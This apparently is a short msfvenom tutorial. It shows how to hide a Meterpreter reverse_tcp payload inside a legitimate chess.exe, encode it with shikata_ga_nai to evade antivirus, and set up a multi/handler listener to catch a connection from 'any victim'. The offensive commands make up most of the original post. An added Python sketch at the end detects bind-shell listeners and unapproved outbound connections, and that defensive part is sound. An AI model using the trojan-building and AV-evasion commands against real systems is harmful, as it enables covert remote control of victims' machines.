msfvenom: creating a reverse shell payload and evading AV



There are two types of shell: bind and reverse. A bind shell creates a new service on the target machine, and the attacker connects to this service.

A reverse shell, on the other hand, is triggered by the user on the target machine, which then connects back to a listener that the attacker runs.

msfvenom allows an attacker to create or re-create a payload and hide it from AV detection.


The command below hides our reverse_tcp payload, encoded with an encoder called shikata_ga_nai, in a file called chess.exe.



msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe

To listen for a connection from any victim, we issue the following commands:


msf > use exploit/multi/handler

msf > set payload windows/meterpreter/reverse_tcp
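
Seen from the defended host, the two shell types described above leave different traces: a bind shell appears as a new listening port, a reverse shell as an outbound connection from a process that has no reason to talk to the internet. The sketch below is an added example, not part of the original post; the socket records, baseline sets, port numbers and function names are all constructed for illustration.

```python
import ipaddress

# Constructed socket snapshot for one Windows host (not real telemetry):
# (process, state, local_port, remote_ip, remote_port)
SAMPLE_SOCKETS = [
    ("svchost.exe", "LISTEN",      135,   None,            None),
    ("chrome.exe",  "ESTABLISHED", 50212, "203.0.113.10",  443),
    ("chess.exe",   "ESTABLISHED", 50377, "198.51.100.23", 8443),
    ("notepad.exe", "LISTEN",      5555,  None,            None),
    ("outlook.exe", "ESTABLISHED", 50401, "10.0.0.25",     993),
]

# Assumed baseline for this host: ports expected to listen, and processes
# expected to open connections to the internet.
BASELINE_LISTEN_PORTS = {135, 445}
EGRESS_ALLOWED_PROCS = {"chrome.exe", "outlook.exe"}

# Listed explicitly: ipaddress.is_private also covers the documentation
# ranges used as stand-in "internet" addresses in the sample data.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_internal(ip):
    """True when ip belongs to one of the internal networks above."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def classify(sockets):
    """Return (process, finding) pairs for sockets matching either pattern."""
    findings = []
    for proc, state, lport, rip, rport in sockets:
        if state == "LISTEN" and lport not in BASELINE_LISTEN_PORTS:
            # Bind-shell pattern: a new service appears on the host.
            findings.append((proc, f"unexpected listener on port {lport}"))
        elif (state == "ESTABLISHED" and not is_internal(rip)
              and proc not in EGRESS_ALLOWED_PROCS):
            # Reverse-shell pattern: the host itself dials out.
            findings.append((proc, f"unapproved egress to {rip}:{rport}"))
    return findings


if __name__ == "__main__":
    for proc, finding in classify(SAMPLE_SOCKETS):
        print(f"{proc}: {finding}")
```

Because the reverse-shell connection starts from inside the network, inbound firewall rules do not see it; per-process egress allowlisting of this kind is what surfaces it.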




